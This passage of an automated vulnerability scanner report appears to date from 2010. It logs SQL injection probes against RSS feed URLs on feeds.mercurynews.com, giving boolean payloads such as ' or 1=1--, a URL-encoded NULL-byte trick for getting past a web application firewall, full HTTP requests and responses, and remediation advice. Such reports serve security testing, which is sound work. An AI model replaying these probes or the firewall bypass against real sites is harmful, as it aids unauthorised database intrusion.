User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:20:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:20:10 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568/200764.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet%00'/568/200765.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:19:31 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet%00''/568/200765.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:31 GMT
Content-Length: 0
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 20373858'%20or%201%3d1--%20 and 20373858'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56820373858'%20or%201%3d1--%20/200765.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:35 GMT
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56820373858'%20or%201%3d2--%20/200765.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:35 GMT
Content-Length: 0
Connection: close
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568/200765.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:38 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568/200765.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 12899183'%20or%201%3d1--%20 and 12899183'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56812899183'%20or%201%3d1--%20/200769.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:16 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/56812899183'%20or%201%3d2--%20/200769.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:17 GMT
Content-Length: 0
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 84226288'%20or%201%3d1--%20 and 84226288'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi84226288'%20or%201%3d1--%20/rss/CustomRssServlet/568/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:13 GMT
Date: Tue, 07 Dec 2010 23:20:13 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi84226288'%20or%201%3d2--%20/rss/CustomRssServlet/568/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:13 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:30 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:31 GMT
Content-Length: 0
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 20519805'%20or%201%3d1--%20 and 20519805'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet20519805'%20or%201%3d1--%20/568/200774.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:00 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet20519805'%20or%201%3d2--%20/568/200774.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:00 GMT
Content-Length: 0
Connection: close
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568/200775.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:20:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:20:35 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568/200775.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:22 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:23 GMT
Date: Tue, 07 Dec 2010 23:20:23 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568%00'/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:20:36 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568%00''/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:37 GMT
Content-Length: 0
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 18366774'%20or%201%3d1--%20 and 18366774'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi18366774'%20or%201%3d1--%20/rss/CustomRssServlet/568/200777.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:21 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi18366774'%20or%201%3d2--%20/rss/CustomRssServlet/568/200777.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:21 GMT
Date: Tue, 07 Dec 2010 23:20:21 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 93033723%20or%201%3d1--%20 and 93033723%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56893033723%20or%201%3d1--%20/200778.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:39 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/56893033723%20or%201%3d2--%20/200778.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:39 GMT
Content-Length: 0
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 18035737'%20or%201%3d1--%20 and 18035737'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet18035737'%20or%201%3d1--%20/568/200779.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:41 GMT
Connection: close
